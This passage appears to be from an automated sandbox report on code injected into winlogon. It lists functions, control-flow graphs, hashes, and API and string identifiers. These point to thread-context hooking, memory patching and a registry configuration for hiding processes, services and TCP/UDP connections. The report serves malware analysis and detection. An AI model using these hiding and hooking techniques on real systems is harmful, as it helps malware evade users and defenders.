__std_exception_copy 29785->29790 29786 225dc6ad712 HeapAlloc 29787 225dc6ad72c 29786->29787 29786->29789 29789->29785 29789->29786 29790->29787 29791 225dc645cf0 29792 225dc645cfd 29791->29792 29793 225dc645d09 29792->29793 29803 225dc645e1a 29792->29803 29794 225dc645d3e 29793->29794 29795 225dc645d8d 29793->29795 29796 225dc645d66 SetThreadContext 29794->29796 29796->29795 29797 225dc645e41 VirtualProtect FlushInstructionCache 29797->29803 29798 225dc645efe 29799 225dc645f1e 29798->29799 29813 225dc6443e0 VirtualFree 29798->29813 29809 225dc644df0 GetCurrentProcess 29799->29809 29801 225dc645f23 29804 225dc645f77 29801->29804 29805 225dc645f37 ResumeThread 29801->29805 29803->29797 29803->29798 29814 225dc647940 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 29804->29814 29806 225dc645f6b 29805->29806 29806->29801 29808 225dc645fbf 29810 225dc644e0c 29809->29810 29811 225dc644e22 VirtualProtect FlushInstructionCache 29810->29811 29812 225dc644e53 29810->29812 29811->29810 29812->29801 29813->29799 29814->29808

                                                        Executed Functions

                                                        Function 00000225DC641628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 406a7c028b3c229bdc1c75f8301e19e1701b13e4dfdd540bc7c265abecc9bc67
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: 47712D7E328E60A6EB109FA9E85869D33B4F784F9AF509111DE4E47B69EF34C444C740
                                                        Function 00000225DC643790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 5b5ece5b16f05410ef88fc7334ca4b30fcb2165cfe8f9a178b0778bd0effcbe9
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 96118B2A318F5493EF549BA9E408269B2A0FB88F86F148038DF8A03B94EF3DC505C704
                                                        Function 00000225DC645B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 59 225dc645b30-225dc645b57 60 225dc645b59-225dc645b68 59->60 61 225dc645b6b-225dc645b76 GetCurrentThreadId 59->61 60->61 62 225dc645b78-225dc645b7d 61->62 63 225dc645b82-225dc645b89 61->63 64 225dc645faf-225dc645fc6 call 225dc647940 62->64 65 225dc645b9b-225dc645baf 63->65 66 225dc645b8b-225dc645b96 call 225dc645960 63->66 69 225dc645bbe-225dc645bc4 65->69 66->64 72 225dc645bca-225dc645bd3 69->72 73 225dc645c95-225dc645cb6 69->73 75 225dc645c1a-225dc645c8d call 225dc644510 call 225dc6444b0 call 225dc644470 72->75 76 225dc645bd5-225dc645c18 call 225dc6485c0 72->76 78 225dc645cbc-225dc645cdc GetThreadContext 73->78 79 225dc645e1f-225dc645e30 call 225dc6474bf 73->79 87 225dc645c90 75->87 76->87 83 225dc645e1a 78->83 84 225dc645ce2-225dc645d03 78->84 90 225dc645e35-225dc645e3b 79->90 83->79 84->83 93 225dc645d09-225dc645d12 84->93 87->69 94 225dc645e41-225dc645e98 VirtualProtect FlushInstructionCache 90->94 95 225dc645efe-225dc645f0e 90->95 97 225dc645d92-225dc645da3 93->97 98 225dc645d14-225dc645d25 93->98 101 225dc645ec9-225dc645ef9 call 225dc6478ac 94->101 102 225dc645e9a-225dc645ea4 94->102 106 225dc645f1e-225dc645f2a call 225dc644df0 95->106 107 225dc645f10-225dc645f17 95->107 103 225dc645e15 97->103 104 225dc645da5-225dc645dc3 97->104 99 225dc645d27-225dc645d3c 98->99 100 225dc645d8d 98->100 99->100 108 225dc645d3e-225dc645d88 call 225dc643970 SetThreadContext 99->108 100->103 101->90 102->101 109 225dc645ea6-225dc645ec1 call 225dc644390 102->109 104->103 110 225dc645dc5-225dc645e10 call 225dc643900 call 225dc6474dd 104->110 120 225dc645f2f-225dc645f35 106->120 107->106 112 225dc645f19 call 225dc6443e0 107->112 108->100 109->101 110->103 112->106 124 225dc645f77-225dc645f95 120->124 125 225dc645f37-225dc645f75 ResumeThread call 225dc6478ac 120->125 128 225dc645fa9 124->128 129 225dc645f97-225dc645fa6 124->129 125->120 128->64 129->128
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                        • Instruction ID: f245da02ec037058e9828f5728e6f8f7909b60f63258dcba4de34453af5a61e8
                                                        • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                        • Instruction Fuzzy Hash: B9D1997A20CF9896DA70DB4AE49835A7BA0F7C8B85F104156EACE47BA5DF3CC541CB40
                                                        Function 00000225DC6450D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 131 225dc6450d0-225dc6450fc 132 225dc64510d-225dc645116 131->132 133 225dc6450fe-225dc645106 131->133 134 225dc645127-225dc645130 132->134 135 225dc645118-225dc645120 132->135 133->132 136 225dc645141-225dc64514a 134->136 137 225dc645132-225dc64513a 134->137 135->134 138 225dc64514c-225dc645151 136->138 139 225dc645156-225dc645161 GetCurrentThreadId 136->139 137->136 140 225dc6456d3-225dc6456da 138->140 141 225dc645163-225dc645168 139->141 142 225dc64516d-225dc645174 139->142 141->140 143 225dc645176-225dc64517c 142->143 144 225dc645181-225dc64518a 142->144 143->140 145 225dc64518c-225dc645191 144->145 146 225dc645196-225dc6451a2 144->146 145->140 147 225dc6451a4-225dc6451c9 146->147 148 225dc6451ce-225dc645225 call 225dc6456e0 * 2 146->148 147->140 153 225dc64523a-225dc645243 148->153 154 225dc645227-225dc64522e 148->154 155 225dc645255-225dc64525e 153->155 156 225dc645245-225dc645252 153->156 157 225dc645236 154->157 158 225dc645230 154->158 159 225dc645273-225dc645298 call 225dc647870 155->159 160 225dc645260-225dc645270 155->160 156->155 157->153 162 225dc6452a6-225dc6452aa 157->162 161 225dc6452b0-225dc6452b6 158->161 172 225dc64532d-225dc645342 call 225dc643cc0 159->172 173 225dc64529e 159->173 160->159 163 225dc6452e5-225dc6452eb 161->163 164 225dc6452b8-225dc6452d4 call 225dc644390 161->164 162->161 167 225dc645315-225dc645328 163->167 168 225dc6452ed-225dc64530c call 225dc6478ac 163->168 164->163 175 225dc6452d6-225dc6452de 164->175 167->140 168->167 178 225dc645351-225dc64535a 172->178 179 225dc645344-225dc64534c 172->179 173->162 175->163 180 225dc64536c-225dc6453ba call 225dc648c60 178->180 181 225dc64535c-225dc645369 178->181 179->162 184 225dc6453c2-225dc6453ca 180->184 181->180 185 225dc6454d7-225dc6454df 184->185 186 225dc6453d0-225dc6454bb call 225dc647440 184->186 188 225dc6454e1-225dc6454f4 call 225dc644590 185->188 189 225dc645523-225dc64552b 185->189 197 225dc6454bd 186->197 198 225dc6454bf-225dc6454ce call 225dc644060 186->198 203 225dc6454f6 188->203 204 225dc6454f8-225dc645521 188->204 192 225dc645537-225dc645546 189->192 193 225dc64552d-225dc645535 189->193 195 225dc645548 192->195 196 225dc64554f 192->196 193->192 194 225dc645554-225dc645561 193->194 200 225dc645563 194->200 201 225dc645564-225dc6455b9 call 225dc6485c0 194->201 195->196 196->194 197->185 208 225dc6454d2 198->208 209 225dc6454d0 198->209 200->201 210 225dc6455bb-225dc6455c3 201->210 211 225dc6455c8-225dc645661 call 225dc644510 call 225dc644470 VirtualProtect 201->211 203->189 204->185 208->184 209->185 216 225dc645671-225dc6456d1 211->216 217 225dc645663-225dc645668 GetLastError 211->217 216->140 217->216
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                        • Instruction ID: ca8f9a462bd9996edb27ee4ecd3a9b3d43bbe2f9124c1ca87dd336038b8394af
                                                        • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                        • Instruction Fuzzy Hash: 1102C83661DF9496EB60CB99E49436AB7A1F3C4795F104056EA8E87BA8DF7CC444CF00
                                                        Function 00000225DC6439E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocQuery
                                                        • String ID:
                                                        • API String ID: 31662377-0
                                                        • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                        • Instruction ID: 3d7c28a49f1379a387e1eab8d3c47744672dc9424a01523034e22865a73a9f88
                                                        • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                        • Instruction Fuzzy Hash: 7F31302625DE98A1EA30DB9DE05835E76A1F388B85F108575F6CF46BA8DF7CC180CB04
                                                        Function 00000225DC64328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: 7d3d60018f90cf45d3bc6b126cf75a44508ad4678cf0a9f52ef5460c3c2565a3
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 7011C07C62CEA8B2FB619BE8F90C3993295AB54B47F50C1B4EB0781690EF78C044C240
                                                        Function 00000225DC644DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                        • String ID:
                                                        • API String ID: 3733156554-0
                                                        • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                        • Instruction ID: 7e590623df8fc7209075b22fdaf8685971673eb90f371bc8902be2096d1f9670
                                                        • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                        • Instruction Fuzzy Hash: 9FF03A2A21CF24D0D630DB89E44976ABBA0F788BD5F148151FA8E43B69CE3CC681CF00
                                                        Function 00000225DC61273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 265 225dc61273c-225dc6127a4 call 225dc6129d4 * 4 274 225dc6127aa-225dc6127ad 265->274 275 225dc6129b2 265->275 274->275 277 225dc6127b3-225dc6127b6 274->277 276 225dc6129b4-225dc6129d0 275->276 277->275 278 225dc6127bc-225dc6127bf 277->278 278->275 279 225dc6127c5-225dc6127e6 VirtualAlloc 278->279 279->275 280 225dc6127ec-225dc61280c 279->280 281 225dc612838-225dc61283f 280->281 282 225dc61280e-225dc612836 280->282 283 225dc612845-225dc612852 281->283 284 225dc6128df-225dc6128e6 281->284 282->281 282->282 283->284 285 225dc612858-225dc61286a LoadLibraryA 283->285 286 225dc6128ec-225dc612901 284->286 287 225dc612992-225dc6129b0 284->287 289 225dc6128ca-225dc6128d2 285->289 290 225dc61286c-225dc612878 285->290 286->287 288 225dc612907 286->288 287->276 291 225dc61290d-225dc612921 288->291 289->285 293 225dc6128d4-225dc6128d9 289->293 292 225dc6128c5-225dc6128c8 290->292 295 225dc612982-225dc61298c 291->295 296 225dc612923-225dc612934 291->296 292->289 297 225dc61287a-225dc61287d 292->297 293->284 295->287 295->291 299 225dc612936-225dc61293d 296->299 300 225dc61293f-225dc612943 296->300 301 225dc6128a7-225dc6128b7 297->301 302 225dc61287f-225dc6128a5 297->302 303 225dc612970-225dc612980 299->303 304 225dc612945-225dc61294b 300->304 305 225dc61294d-225dc612951 300->305 306 225dc6128ba-225dc6128c1 301->306 302->306 303->295 303->296 304->303 307 225dc612963-225dc612967 305->307 308 225dc612953-225dc612961 305->308 306->292 307->303 310 225dc612969-225dc61296c 307->310 308->303 310->303
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AllocLibraryLoadVirtual
                                                        • String ID:
                                                        • API String ID: 3550616410-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: b5a9ffdff3e85ff3f1f12f145a610503c53f3502f35e5ceb3ac916478b11310c
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: D261363AB02AA097DF56CF5ED00876DB392F754BA6F18C521CE5907788DA38D852C700
                                                        Function 00000225DC641ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00000225DC641628: GetProcessHeap.KERNEL32 ref: 00000225DC641633
                                                          • Part of subcall function 00000225DC641628: HeapAlloc.KERNEL32 ref: 00000225DC641642
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416B2
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416DF
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6416F9
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641719
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641734
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641754
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64176F
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64178F
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417AA
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6417CA
                                                        • Sleep.KERNEL32 ref: 00000225DC641AD7
                                                        • SleepEx.KERNELBASE ref: 00000225DC641ADD
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417E5
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641805
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641820
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641840
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64185B
                                                          • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64187B
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641896
                                                          • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6418A0
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: b89290e72799dd3975187c06206b195ef9f7eec7f326f7ac498d84b976088364
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 0731356921CE61B2FF509BAED6593A933A4AB54BC6F04D4A19E0F873E5FF30C451C210
                                                        Function 00000225DC67273C Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 350 225dc67273c-225dc6727a4 call 225dc6729d4 * 4 359 225dc6727aa-225dc6727ad 350->359 360 225dc6729b2 350->360 359->360 362 225dc6727b3-225dc6727b6 359->362 361 225dc6729b4-225dc6729d0 360->361 362->360 363 225dc6727bc-225dc6727bf 362->363 363->360 364 225dc6727c5-225dc6727e6 VirtualAlloc 363->364 364->360 365 225dc6727ec-225dc67280c 364->365 366 225dc672838-225dc67283f 365->366 367 225dc67280e-225dc672836 365->367 368 225dc672845-225dc672852 366->368 369 225dc6728df-225dc6728e6 366->369 367->366 367->367 368->369 372 225dc672858-225dc67286a 368->372 370 225dc6728ec-225dc672901 369->370 371 225dc672992-225dc6729b0 369->371 370->371 373 225dc672907 370->373 371->361 379 225dc67286c-225dc672878 372->379 380 225dc6728ca-225dc6728d2 372->380 375 225dc67290d-225dc672921 373->375 377 225dc672923-225dc672934 375->377 378 225dc672982-225dc67298c 375->378 383 225dc672936-225dc67293d 377->383 384 225dc67293f-225dc672943 377->384 378->371 378->375 385 225dc6728c5-225dc6728c8 379->385 380->372 381 225dc6728d4-225dc6728d9 380->381 381->369 387 225dc672970-225dc672980 383->387 388 225dc672945-225dc67294b 384->388 389 225dc67294d-225dc672951 384->389 385->380 386 225dc67287a-225dc67287d 385->386 390 225dc6728a7-225dc6728b7 386->390 391 225dc67287f-225dc6728a5 386->391 387->377 387->378 388->387 392 225dc672963-225dc672967 389->392 393 225dc672953-225dc672961 389->393 394 225dc6728ba-225dc6728c1 390->394 391->394 392->387 395 225dc672969-225dc67296c 392->395 393->387 394->385 395->387
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: c822286e1b467df8a310eb99b0d592360f537eec13a50740bd2f5dfddf19021e
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: A561483AB01AA0D7DB56CF9AD00876DB3A2F754BA5F18C921CF5907BC8DA38D852C700
                                                        Function 00000225DC6AD6CC Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 397 225dc6ad6cc-225dc6ad6db 398 225dc6ad6dd-225dc6ad6e9 397->398 399 225dc6ad6eb-225dc6ad6fb 397->399 398->399 400 225dc6ad72e-225dc6ad739 call 225dc6ad6ac 398->400 401 225dc6ad712-225dc6ad72a HeapAlloc 399->401 406 225dc6ad73b-225dc6ad740 400->406 402 225dc6ad6fd-225dc6ad704 call 225dc6b0720 401->402 403 225dc6ad72c 401->403 402->400 409 225dc6ad706-225dc6ad710 call 225dc6ab85c 402->409 403->406 409->400 409->401
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AllocHeap
                                                        • String ID:
                                                        • API String ID: 4292702814-0
                                                        • Opcode ID: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                        • Instruction ID: d48ce241fd5c6b57c9d66a3839ec59588558f897ab86195e616c0656e38ee758
                                                        • Opcode Fuzzy Hash: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                        • Instruction Fuzzy Hash: 21F05E6C301E2161FE6DDBEE995D3A552955F89B82F6CE4344D0AC67E2EE3CC481C620

                                                        Non-executed Functions

                                                        Function 00000225DC6A2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 8b409eee056ac65ba81e46254c59d85845063fb26c80b4bd130284c66f771075
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 96B1B37A290E60A2EBAADFADC44876963A5F744B86F24D016DE0DD3B95DF35CC81C340
                                                        Function 00000225DC642B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 02e5d621d8295eb5dd385e75f9606a0c78f62cf6da70878d64f9e7b1c174dd69
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: DCB1B47A21CE60A6EB968FEDC4487A973A5F744B8AF24D056DE0A53B94DF34CC41C340
                                                        Function 00000225DC6A7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 3b87e895a044953073a839ffa4b4feaece301703ffc135d08af6657be6a0d668
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 14317276205F9099EB64DFA4E8443EE73A1F78474AF448029DB4E57B94EF38C548CB10
                                                        Function 00000225DC647D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: a0dd4a3191c2f22ec65cd5f9c7d8c34c65d38d6a3a9ca6151c6be4ce44add157
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 29318376219F909AEB609FA4E8447ED73A0F784745F44812ADB4E57B94EF38C548CB10
                                                        Function 00000225DC6AD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 4dbdfab791ea173b22a2c1feee1540d37dae8e72db698209205baee473c09c96
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: 7631C93A214F90A6EB64CFA9E8443DE73A0F789756F504126EB9D43B54DF38C145CB00
